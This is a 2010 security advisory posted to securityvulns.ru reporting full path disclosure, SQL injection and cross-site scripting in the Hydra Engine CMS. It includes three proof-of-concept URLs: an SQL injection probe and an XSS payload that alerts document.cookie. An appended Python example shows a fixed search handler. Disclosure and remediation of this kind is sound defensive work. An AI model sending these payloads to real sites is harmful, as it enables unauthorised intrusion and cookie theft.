Computer Security
[EN] securityvulns.ru

From: MustLive <mustlive_(at)_websecurity.com.ua>
Date: 04.02.2010
Subject: Vulnerabilities in Hydra Engine

Hello 3APA3A!

I am informing you about Full path disclosure, SQL Injection and Cross-Site Scripting vulnerabilities in the Hydra Engine system. It is a Ukrainian CMS.

Full path disclosure:

http://site/search/’/

SQL Injection:

http://site/search/'%20and%20version()%3E5--%20/

XSS:

http://site/search/'1%3Cbody%20onload=alert(document.cookie)%3E/

I mentioned these vulnerabilities on my site (http://websecurity.com.ua/3453/).

Best wishes & regards,
MustLive
Site administrator
http://websecurity.com.ua
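
Added example, not part of the original message and not Hydra Engine code: all three reports place their input in the same `/search/<term>/` path segment, so this handler shows that segment treated as data at the SQL sink, the HTML sink and the error path. The table, function names and SQLite backend are assumptions, as is the premise that the path disclosure comes from an error message returned to the client.

```python
import html
import sqlite3
from urllib.parse import unquote

def make_db():
    """Constructed sample data; the real CMS schema is not shown in the advisory."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (title TEXT)")
    db.executemany("INSERT INTO pages VALUES (?)",
                   [("About Hydra",), ("Contact",), ("O'Reilly books",)])
    return db

def search_term_from_path(path):
    """Extract and percent-decode the <term> in /search/<term>/ (hypothetical routing)."""
    prefix = "/search/"
    if not path.startswith(prefix):
        raise ValueError("not a search URL")
    return unquote(path[len(prefix):].rstrip("/"))

def render_search(db, path):
    """Return (status, html_body) for a search request."""
    term = search_term_from_path(path)
    try:
        # Bound parameter: a quote in the term stays data, never SQL syntax.
        rows = db.execute(
            "SELECT title FROM pages WHERE title LIKE '%' || ? || '%'",
            (term,)).fetchall()
    except sqlite3.Error:
        # Generic body: no exception text, query or file path reaches the client.
        # Details belong in a server-side log.
        return 500, "<p>Search is unavailable.</p>"
    # Encode everything echoed into HTML: the term and the stored titles alike.
    items = "".join(f"<li>{html.escape(title)}</li>" for (title,) in rows)
    return 200, f"<h1>Results for {html.escape(term)}</h1><ul>{items}</ul>"

if __name__ == "__main__":
    db = make_db()
    for path in ("/search/Hydra/", "/search/'/"):
        print(path, render_search(db, path))
```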

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


